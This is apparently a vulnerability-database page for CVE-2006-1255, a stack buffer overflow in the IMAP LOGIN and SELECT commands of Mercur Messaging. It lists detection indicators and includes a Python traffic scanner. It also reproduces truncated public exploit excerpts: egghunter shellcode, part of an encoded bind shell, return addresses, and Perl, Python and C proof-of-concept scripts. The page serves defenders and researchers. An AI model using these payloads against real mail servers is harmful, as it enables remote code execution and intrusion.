CVE-2006-1255
Published 2006-03-19
Priority P3 (51) · critical · CVSS 2.0 base score 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit: available · EPSS: 68.15% (99.2nd percentile)
Stack-based buffer overflow in the IMAP service in Mercur Messaging 5.0 SP3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long string to the (1) LOGIN or (2) SELECT command, a different set of attack vectors and possibly a different vulnerability than CVE-2003-1177.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mercur | mercur_messaging | <= 2005_5.0_sp3 | — |
Detection & IOCs (extracted from sources)
- bytes: \x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7 (32-byte egghunter stub carried in the LOGIN payload; it searches memory for the egg tag and jumps to the second stage)
- bytes: \x54\x30\x30\x57\x54\x30\x30\x57 (egg tag written twice, ASCII "T00WT00W"; the exploit calls it w00tw00t)
- bytes: \x81\xc4\x54\xf2\xff\xff (PrependEncoder stack adjustment: add esp, -3500, which moves esp off the region the decoder will overwrite)
- Detect oversized IMAP LOGIN command strings sent to Mercur IMAP on port 143; a LOGIN argument exceeding ~228 bytes (the payload space of the overflow) is anomalous and indicative of exploitation.
- Detect oversized IMAP SELECT command arguments (~251+ bytes) sent after successful authentication to the Mercur IMAP service on port 143.
- Detect oversized IMAP LIST command arguments sent after authentication; the 2007 egghunter exploit sends a 1000+ byte LIST argument containing NOP sleds and the second-stage shellcode.
- Look for the egghunter tag bytes 0x54 0x30 0x30 0x57 (ASCII 'T00W') repeated twice in IMAP traffic as an indicator of egghunter-based exploitation of Mercur IMAP.
- Detect the stack-adjustment prepend encoder sequence \x81\xc4\x54\xf2\xff\xff in IMAP LOGIN payloads, used by the Metasploit module for this CVE.
- The public exploits deliver a win32_bind payload with LPORT=4444: watch for the Mercur IMAP process (mcrimap4.exe) opening a new listening socket on TCP 4444 right after it receives a large IMAP command. An unexpected outbound connection from that process covers the reverse payloads the Metasploit module recommends.
- The Metasploit module uses EXITFUNC=thread and targets Windows 2000 SP4 and Windows XP SP2; correlate the RET addresses 0x7c2ec68b and 0x77dc15c0 appearing in IMAP stream data (on the wire they are little-endian: 8b c6 2e 7c and c0 15 dc 77).
- Payload space in the LOGIN overflow is very limited (228 bytes); the Metasploit module recommends reverse ordinal payloads, and the 2007 standalone exploit uses an egghunter to locate a larger second-stage payload delivered via the LIST command.
- Bad characters for the LOGIN overflow payload are \x00 \x20 \x2c \x3a \x40 (null, space, comma, colon, at-sign); encoders must avoid these bytes.
- The SELECT overflow exploit requires a valid authenticated session before sending the oversized SELECT argument; unauthenticated exploitation is not possible for the SELECT vector.
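As an added example (not code from this page or from any of the exploit authors), the following Python script applies the indicators above to a client-to-server IMAP byte stream. It isolates the longest space-free token of each command (space is a bad character for this overflow, so the payload always arrives as one token), applies the 228/251/1000-byte thresholds, searches each argument for the egghunter stub, the prepend encoder, the egg and a NOP sled, decodes the egg tag and the stack displacement from the stubs themselves, and records whether a SELECT or LIST arrived after a LOGIN. The traffic in build_sample(), the 0xdeadbeef return address, the 0xcc stand-in for the 709-byte bind shell and the rule that a normal-sized LOGIN counts as a successful authentication are all assumptions of the example, not facts from the page.

```python
"""Scan client->server IMAP bytes for the CVE-2006-1255 exploitation indicators
listed above. Byte patterns and thresholds come from the page; the sample traffic
in build_sample() is constructed for this example, not captured."""
import struct

LOGIN_MAX, SELECT_MAX, LIST_MAX = 228, 251, 1000      # thresholds from the IOC list
EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
             b"\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
PREPEND = b"\x81\xc4\x54\xf2\xff\xff"                  # add esp, imm32 (Metasploit PrependEncoder)
NOP_SLED = b"\x90" * 32                                # 32 consecutive NOPs is our sled heuristic


def egg_tag(hunter=EGGHUNTER):
    """The tag the hunter scans for is the imm32 of its 'mov eax, imm32' (opcode 0xb8).
    The egg the second stage must carry is that tag written twice."""
    i = hunter.index(b"\xb8")
    return hunter[i + 1:i + 5]                          # b"T00W" as it appears on the wire


def stack_adjustment(prepend=PREPEND):
    """Decode 'add esp, imm32' (81 c4 imm32) to its signed displacement in bytes."""
    if prepend[:2] != b"\x81\xc4":
        raise ValueError("not an 'add esp, imm32' encoding")
    return struct.unpack("<i", prepend[2:6])[0]


def iter_commands(stream):
    """Yield (tag, COMMAND, arguments) for each CRLF-terminated client line.
    0x20 is a bad character for the payload, so the overflow arrives as one
    space-free token; splitting on the first two spaces isolates it."""
    for line in stream.split(b"\r\n"):
        parts = line.split(b" ", 2)
        if len(parts) < 2:
            continue
        args = parts[2] if len(parts) == 3 else b""
        yield parts[0].decode("latin-1"), parts[1].upper(), args


def scan(stream):
    """Return a list of findings (dicts) for one client->server IMAP stream."""
    limits = {b"LOGIN": LOGIN_MAX, b"SELECT": SELECT_MAX, b"LIST": LIST_MAX}
    patterns = (("egghunter", EGGHUNTER), ("egg tag", egg_tag() * 2),
                ("prepend encoder", PREPEND), ("NOP sled", NOP_SLED))
    findings, seen_login = [], False
    for tag, cmd, args in iter_commands(stream):
        name = cmd.decode("latin-1")
        longest = max(len(t) for t in args.split(b" "))
        if cmd in limits and longest > limits[cmd]:
            findings.append({"tag": tag, "cmd": name, "arg_len": longest,
                             "after_login": seen_login,   # SELECT/LIST vectors need a session
                             "reason": f"oversized {name} argument (> {limits[cmd]})"})
        for label, pat in patterns:
            off = args.find(pat)
            if off != -1:
                findings.append({"tag": tag, "cmd": name, "arg_len": longest,
                                 "after_login": seen_login,
                                 "reason": f"{label} at offset {off}"})
        if cmd == b"LOGIN" and longest <= LOGIN_MAX:
            seen_login = True   # assumption: no server replies in hand, so a sane LOGIN counts as success
    return findings


def build_sample():
    """Constructed client traffic shaped like the 2007 egghunter exploit: a normal
    session, then a LOGIN carrying the egghunter and a LIST carrying the egg plus a
    0xcc stand-in for the 709-byte bind shell. The 40-byte padding and the 0xdeadbeef
    return address are placeholders, not the real offsets."""
    benign = b"a001 LOGIN alice secret\r\na002 SELECT INBOX\r\n"
    stage1 = b"\x90" * 92 + EGGHUNTER + b"\x90" * 100          # 224 bytes: fits the 228-byte LOGIN space
    login = b"a003 LOGIN " + b"A" * 40 + b"\xef\xbe\xad\xde" + PREPEND + stage1 + b"\r\n"
    lst = b"a004 LIST " + b"\x90" * 320 + egg_tag() * 2 + b"\xcc" * 709 + b"\r\n"
    return benign + login + lst


if __name__ == "__main__":
    print("egg tag:", egg_tag(), "stack adjustment:", stack_adjustment())
    for f in scan(build_sample()):
        print(f"{f['tag']} {f['cmd']:<6} len={f['arg_len']:<5} after_login={f['after_login']} {f['reason']}")
```

The script only sees the client side, so it cannot confirm that a LOGIN actually succeeded; a real sensor should gate the SELECT and LIST rules on the server's tagged OK reply rather than on the after_login heuristic used here. Splitting on CRLF is enough for these payloads because the bad-character list and the page's own shellcode contain no 0x0d 0x0a, but a sensor should reassemble IMAP literals ({n}CRLF) before applying the length rules.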
No detection rules found.
Exploit-DB
Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit) · exploitdb · 2010-09-20
---
##
# $Id: mercur_imap_select_overflow.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
	# (mixin include lines were lost to HTML extraction on the source page)

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',
			'Description' => %q{
					Mercur v5.0 IMAP server is prone to a remotely exploitable
					stack-based buffer overflow vulnerability. This issue is due
					to a failure of the application to properly bounds check
					user-supplied data prior to copying it to a fixed size memory buffer.
					Credit to Tim Taylor for discovering the vulnerability.
			},
			# ... (remainder of the module truncated by the source page)
Exploit-DB
Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit) · exploitdb · 2010-08-25
---
##
# $Id: mercur_login.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
	# (mixin include lines were lost to HTML extraction on the source page)

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'Mercur Messaging 2005 IMAP Login Buffer Overflow',
			'Description' => %q{
					This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.
					Since the room for shellcode is small, using the reverse ordinal payloads
					yields the best results.
			},
			'Author'      => [ 'MC' ],
			'License'     => MSF_LICENSE,
			'Version'     => '$Revision: 10150 $',
			'References'  =>
				[
					[ 'CVE', '2006-1255' ],
					# ... (remainder of the module truncated by the source page)
Exploit-DB
Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter) · exploitdb · 2007-03-21
---
import os
import sys
import time
import socket
import struct
# Place our w00tw00t egghunter in nop heaven
shellcode = "\x90" * 92
# 32-byte skape-style egghunter: or dx,0xfff / inc edx / push edx / push 2 / pop eax / int 0x2e
# / cmp al,5 / pop edx / je   probes each page through a syscall so an unmapped page does not
# crash the process; then mov eax,0x57303054 ("T00W") / mov edi,edx / scasd / jnz / scasd / jnz
# / jmp edi   looks for the tag twice in a row and jumps to the bytes that follow it.
shellcode +="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
shellcode +="\x90" * 100
# Place w00t and bindshell in correct place in LIST command.
bindshell = "\x90" * 320
bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57"   # the egg: tag twice; the hunter lands right after it
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54"   # ... (encoded bind shell and the rest of the script cut here by the source page)
)
Exploit-DB
Mercur Messaging 2005 - IMAP Remote Buffer Overflow · exploitdb · 2007-01-15
---
#!/bin/perl
# tested on win2k server SP4 English
# ATTENTION! If you use another valid account you must change the offsets; this is only a PoC
#
use IO::Socket::INET;
my $host = shift(@ARGV);
my $port = 143;
my $reply;
my $request;
my $user = "test";
my $pass = "test";
my $nop = "\x90"x8;
my $nop1 = "\x90"x20;
my $ret = "\x42\xb2\xc1\x40";   # 0x40c1b242, little-endian
#my $ret = "\x42\x42\x42\x42"; #call edi in mcrimap4.exe
my $asm="\x8b\xc7\x83\xc0\x23\x50\xc3";
# asm is a binary translation of these assembly instructions; eax now holds the correct memory address of the shellcode
#
# 8BC7     MOV EAX,EDI
# 83C0 23  ADD EAX,23
# 50       PUSH EAX
# C3       RETN
# A binary translation of NGS "Writing Small Shellcode" by Dafydd Stuttard with only two little differences
#1)b
# (script truncated here by the source page)
Exploit-DB
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2) · exploitdb · 2006-09-11
---
#!/usr/bin/perl
# Tested on Windows 2k SP4 Italian and English version and Win XP Pro SP2 Italian and English version
# Perl script based on Sami FTP server remote exploit by Critical Security
# https://www.securityfocus.com/bid/17138
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV < 2) {
    # (the usage message, the $host/$port parsing and the $pad, $eip and $shellcode
    #  definitions that followed were lost to HTML extraction on the source page)
}
$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
# first chunk: padding, overwritten return address and shellcode
$exploit = "a001 LOGIN " . $pad . $eip . $shellcode . "\r\n";
send $socket, $exploit, 0;
print "[+] sending 1st chunk\n";
# second chunk: padding and return address only
$exploit = "a001 LOGIN " . $pad . $eip . "\r\n";
send $socket, $exploit, 0;
print "[+] sending 2nd chunk\n";
print " + connecting port 4444 of $host\n";
# (script truncated here by the source page)
Exploit-DB
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1) · exploitdb · 2006-03-19
---
/*
* mercur.cpp
*
* Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
* Copyright (C) 2006 Javaphile Group
* http://www.javaphile.org
*
* Exploits code by : pll Ellison.Tang[at]gmail[dot]com
*
* Bug Reference:
* http://www.frsirt.com/bulletins/4332
*
*/
/* header names were stripped by HTML extraction on the source page; reconstructed
 * from the calls used below (printf, exit, WSAStartup, gethostbyname) */
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32")
SOCKET ConnectTo(char *ip, int port)
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout=150000;
if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
{
printf("[-]WSAStartup failed.\n");
exit(-1);
}
if((he=gethostbyname(ip))==0)
{
printf("[-]Failed to resolve '%s'.", ip);
exit(-1);
}
host.sin_port=htons(port);
host.sin_family=AF_INET;
host.sin_addr=*((struct in_addr *)he->h_addr);
/* ... (remainder of the exploit truncated by the source page) */
Metasploit
Mercur Messaging 2005 IMAP Login Buffer Overflow
This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3. Since the room for shellcode is small, using the reverse ordinal payloads yields the best results.
Metasploit
Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
Mercur v5.0 IMAP server is prone to a remotely exploitable stack-based buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. Credit to Tim Taylor for discovering the vulnerability.
No writeups or analysis indexed.
References
- http://seclists.org/fulldisclosure/2006/Mar/1111
- http://seclists.org/fulldisclosure/2006/Mar/1167
- http://secunia.com/advisories/19267
- http://www.osvdb.org/23950
- http://www.securityfocus.com/bid/17138
- http://www.vupen.com/english/advisories/2006/0977
- https://exchange.xforce.ibmcloud.com/vulnerabilities/25290